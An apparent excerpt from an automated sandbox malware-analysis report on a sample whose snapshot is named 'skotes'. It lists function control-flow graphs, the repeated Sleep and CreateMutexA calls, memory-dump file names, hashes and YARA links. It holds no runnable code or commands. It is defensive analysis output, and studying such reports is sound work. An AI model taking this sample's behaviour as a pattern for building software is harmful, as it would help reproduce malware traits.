                                                                                                                                                                                                                                                                            control_flow_graph 22 f99f44-f99f64 26 f99f92-f99fae 22->26 27 f99f66-f99f72 22->27 30 f99fdc-f99ffb 26->30 31 f99fb0-f99fbc 26->31 28 f99f88-f99f8f call fad663 27->28 29 f99f74-f99f82 27->29 28->26 29->28 34 f9a92b 29->34 32 f9a029-f9a916 call fa80c0 30->32 33 f99ffd-f9a009 30->33 36 f99fbe-f99fcc 31->36 37 f99fd2-f99fd9 call fad663 31->37 38 f9a00b-f9a019 33->38 39 f9a01f-f9a026 call fad663 33->39 41 f9a953-f9a994 Sleep CreateMutexA 34->41 42 f9a92b call fc6c6a 34->42 36->34 36->37 37->30 38->34 38->39 39->32 51 f9a9a7-f9a9a8 41->51 52 f9a996-f9a998 41->52 42->41 52->51 54 f9a99a-f9a9a5 52->54 54->51
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00F9A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00FF3254), ref: 00F9A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: e2f4cb1cf7f3fe67fb9ca720292f104e1239b352907698e43995c669763f7740
                                                                                                                                                                                                                                                                            • Instruction ID: 5327f31b0812b3f06b141f931ad7dd2a86b265a917cf5bae7fd34f6a7820c9d2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2f4cb1cf7f3fe67fb9ca720292f104e1239b352907698e43995c669763f7740
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87314671B041448BFF18DB7CDC897ADB762EF86320F208618E415E73D5D77A8980A792
                                                                                                                                                                                                                                                                            Function 00F9A079 Relevance: 3.1, APIs: 2, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 56 f9a079-f9a099 60 f9a09b-f9a0a7 56->60 61 f9a0c7-f9a0e3 56->61 62 f9a0a9-f9a0b7 60->62 63 f9a0bd-f9a0c4 call fad663 60->63 64 f9a111-f9a130 61->64 65 f9a0e5-f9a0f1 61->65 62->63 70 f9a930-f9a994 call fc6c6a Sleep CreateMutexA 62->70 63->61 68 f9a15e-f9a916 call fa80c0 64->68 69 f9a132-f9a13e 64->69 66 f9a0f3-f9a101 65->66 67 f9a107-f9a10e call fad663 65->67 66->67 66->70 67->64 74 f9a140-f9a14e 69->74 75 f9a154-f9a15b call fad663 69->75 86 f9a9a7-f9a9a8 70->86 87 f9a996-f9a998 70->87 74->70 74->75 75->68 87->86 88 f9a99a-f9a9a5 87->88 88->86
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00F9A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00FF3254), ref: 00F9A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: 8f1599b3ee62f297c84353a6abe677e672db4b4c0c600458a7f7f92d62000a45
                                                                                                                                                                                                                                                                            • Instruction ID: 44d41a7f84055dcd414eaf92d882e609705c6fa5e8b7a6f666f98a67223e02b2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8f1599b3ee62f297c84353a6abe677e672db4b4c0c600458a7f7f92d62000a45
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E317731B001449BFF08DB78DD89B6DB772EF86320F208218E414973E5C77A99C0AB96
                                                                                                                                                                                                                                                                            Function 00F9A1AE Relevance: 3.1, APIs: 2, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 90 f9a1ae-f9a1ce 94 f9a1fc-f9a218 90->94 95 f9a1d0-f9a1dc 90->95 96 f9a21a-f9a226 94->96 97 f9a246-f9a265 94->97 98 f9a1de-f9a1ec 95->98 99 f9a1f2-f9a1f9 call fad663 95->99 100 f9a228-f9a236 96->100 101 f9a23c-f9a243 call fad663 96->101 102 f9a293-f9a916 call fa80c0 97->102 103 f9a267-f9a273 97->103 98->99 104 f9a935 98->104 99->94 100->101 100->104 101->97 110 f9a289-f9a290 call fad663 103->110 111 f9a275-f9a283 103->111 106 f9a953-f9a994 Sleep CreateMutexA 104->106 107 f9a935 call fc6c6a 104->107 119 f9a9a7-f9a9a8 106->119 120 f9a996-f9a998 106->120 107->106 110->102 111->104 111->110 120->119 122 f9a99a-f9a9a5 120->122 122->119
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00F9A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00FF3254), ref: 00F9A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192203030.000000000118E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192228643.000000000119E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192249856.000000000119F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192272763.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192291696.00000000011B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192309743.00000000011B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192329284.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192353043.00000000011BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192372056.00000000011C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192391121.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192410751.00000000011C9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192434994.00000000011DE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192454832.00000000011E1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192474813.00000000011E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192493129.00000000011EA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192512167.00000000011EB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192531136.00000000011F0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192558914.00000000011F7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192577269.00000000011F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192598157.0000000001206000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192617604.0000000001208000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192638201.000000000120F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192667260.0000000001214000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192685890.0000000001215000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192704268.0000000001218000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192724830.0000000001221000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.0000000001223000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192743382.000000000125D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192804813.0000000001277000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192824766.0000000001278000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192846058.000000000128C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192864359.000000000128D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192882548.000000000128E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192900314.0000000001293000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192917383.0000000001295000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192936942.00000000012A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192957004.00000000012A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_f90000_skotes.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                                                                                                            • Opcode ID: e2b460acb287a164cdd230f226ff1f32fab5fb3afeaf107602a137c335c2dc98
                                                                                                                                                                                                                                                                            • Instruction ID: 09aed7e07f218c518bf6c94bc73d56d211eb7c137556ae9508c03c61e248849a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2b460acb287a164cdd230f226ff1f32fab5fb3afeaf107602a137c335c2dc98
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AC312671B041449BFF08DB78DD89B6DB772EF86310F208218E4149B3D5D77689C0AB96
                                                                                                                                                                                                                                                                            Function 00F9A418 Relevance: 3.1, APIs: 2, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                            control_flow_graph 124 f9a418-f9a438 128 f9a43a-f9a446 124->128 129 f9a466-f9a482 124->129 132 f9a448-f9a456 128->132 133 f9a45c-f9a463 call fad663 128->133 130 f9a4b0-f9a4cf 129->130 131 f9a484-f9a490 129->131 136 f9a4fd-f9a916 call fa80c0 130->136 137 f9a4d1-f9a4dd 130->137 134 f9a492-f9a4a0 131->134 135 f9a4a6-f9a4ad call fad663 131->135 132->133 138 f9a93f-f9a949 call fc6c6a * 2 132->138 133->129 134->135 134->138 135->130 142 f9a4df-f9a4ed 137->142 143 f9a4f3-f9a4fa call fad663 137->143 155 f9a94e 138->155 156 f9a949 call fc6c6a 138->156 142->138 142->143 143->136 157 f9a953-f9a994 Sleep CreateMutexA 155->157 158 f9a94e call fc6c6a 155->158 156->155 160 f9a9a7-f9a9a8 157->160 161 f9a996-f9a998 157->161 158->157 161->160 162 f9a99a-f9a9a5 161->162 162->160
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • Sleep.KERNELBASE(00000064), ref: 00F9A963
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00FF3254), ref: 00F9A981
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.2191722151.0000000000F91000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191522995.0000000000F90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191722151.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191858509.0000000000FF9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191881227.0000000000FFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2191927642.0000000001007000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192081416.000000000115C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192103935.000000000115E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001176000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192136126.0000000001182000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000002.00000002.2192181803.000000000118D000.00000080.00000001.01000000.00000007.sdmpDownload File
